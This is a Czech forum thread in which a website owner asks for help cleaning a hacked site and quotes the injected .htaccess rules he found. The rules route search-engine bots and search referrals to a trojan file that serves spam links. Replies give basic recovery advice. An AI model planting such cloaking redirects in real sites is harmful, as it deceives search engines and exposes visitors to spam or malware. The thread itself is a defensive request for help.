Nakažený web

[pcurik]

Prosím někoho, kdo by odviroval a zabezpečil web.
Google hlásí napadené stránky a search console zobrazuje cizí kód.
Díky moc. Petr Čuřík

[Eldan]

Nějaké bližší informace by nebyly? Takhle vůbec netuším o čem to mluvíš...

[pcurik]

Jasný. Takže.. Google začal hlásit, že byl web nejspíše napaden hackery. Jde o http://www.zivaexotika.cz/. Je to web bez RS.
Po bližším prozkoumání jsem našel pár vložených věcí. Viz přílohy. Dále je pozměněný .htaccess.

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo|bing)
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (html|htm|php)$ [NC]
RewriteCond %{REQUEST_FILENAME} !common.php
RewriteCond %{DOCUMENT_ROOT}/rezervacnisystem/common.php -f
RewriteRule ^.*$ /rezervacnisystem/common.php [L]
</IfModule>[L]
</IfModule>

a soubor common.php je trojan.

To, co Google našel vložené do těch stránek, jsou především odkazy na viagru.

Díky

[Eldan]

Je to hostované na dedikovaném serveru, nebo u hostingu? Mohl být napadený hosting a editace proběhla tím. Pokud je to samostatný web, pak asi někdo "uhodl" vaše přihlašovací údaje - ihned změnit, a s tím i na všech ostatních místech kde je používáte (pokud jste neopatrný a máte stejné heslo na více místech). Samozřejmě soubory vraťte do původního stavu.

[pcurik]

... hostuji u C4. Problém je, že google zobrazuje vložené kódy, ale když vlezu do souboru, tak tam žádný takový řetězec viditelný není. Tudíž vlastně ani nemám šanci zjistit, jestli je moje záloha čistá (předpokládám, že ano). Jednoduše řečeno - chápu, že možná nebude až tak složité dát web do pořádku, ale já si na to netroufám. Nejsem si jistý "kam sáhnout". Druhý krok potom je kontrola zebezpečení souborů webu - jak?

[Eldan]

Pokud máte zálohu, u které víte, že je zdravá, nahrál bych tu. Můžete také kontaktovat provozovatele hostingu, určitě vám pomůže zjistit co přesně se vám s webem stalo a případně to i opravit.